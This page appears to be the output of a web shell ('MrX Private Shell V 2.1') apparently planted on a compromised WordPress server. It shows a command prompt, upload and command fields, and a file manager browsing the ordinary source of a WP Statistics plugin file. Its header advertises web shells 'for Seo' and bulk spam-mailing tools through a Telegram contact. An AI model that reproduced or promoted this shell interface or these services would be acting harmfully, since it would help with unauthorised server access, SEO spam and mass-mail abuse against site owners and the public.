__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

namespace WP_Statistics\Service\Admin\Referrals;

use WP_STATISTICS\Menus;
use WP_STATISTICS\Option;
use WP_STATISTICS\User;
use WP_Statistics\Utils\Request;
use WP_Statistics\Models\VisitorsModel;
use WP_Statistics\Service\Analytics\VisitorProfile;
use WP_Statistics\Utils\Url;

class ReferralsManager
{

    public function __construct()
    {
        add_filter('wp_statistics_admin_menu_list', [$this, 'addMenuItem']);
        add_filter('wp_statistics_visitor_data_before_update', [$this, 'handleLastTouchAttributionModel'], 10, 2);
    }

    /**
     * Updates visitor data based on the last touch attribution model, when user is coming from external sources.
     *
     * @param array $data Visitor data to be updated.
     * @param VisitorProfile $visitorProfile Visitor profile object.
     *
     * @return array Updated visitor data.
     */
    public function handleLastTouchAttributionModel($data, $visitorProfile)
    {
        // Update Visitor source info if attribution model is last touch
        if (Option::get('attribution_model') === 'last-touch') {
            // If visitor is referred from external sources, update referrals info
            if ($visitorProfile->isReferred()) {
                $data['referred']       = $visitorProfile->getReferrer();
                $data['source_channel'] = $visitorProfile->getSource()->getChannel();
                $data['source_name']    = $visitorProfile->getSource()->getName();
            }
        }

        return $data;
    }

    /**
     * Add menu item
     *
     * @param array $items
     * @return array
     */
    public function addMenuItem($items)
    {
        $items['referrals'] = [
            'sub'       => 'overview',
            'title'     => esc_html__('Referrals', 'wp-statistics'),
            'page_url'  => 'referrals',
            'callback'  => ReferralsPage::class,
            'priority'  => 27
        ];

        return $items;
    }
}

Filemanager

Name Type Size Permission Actions
Views Folder 0755
ReferralsDataProvider.php File 6.73 KB 0644
ReferralsManager.php File 1.91 KB 0644
ReferralsPage.php File 10.86 KB 0644
Filemanager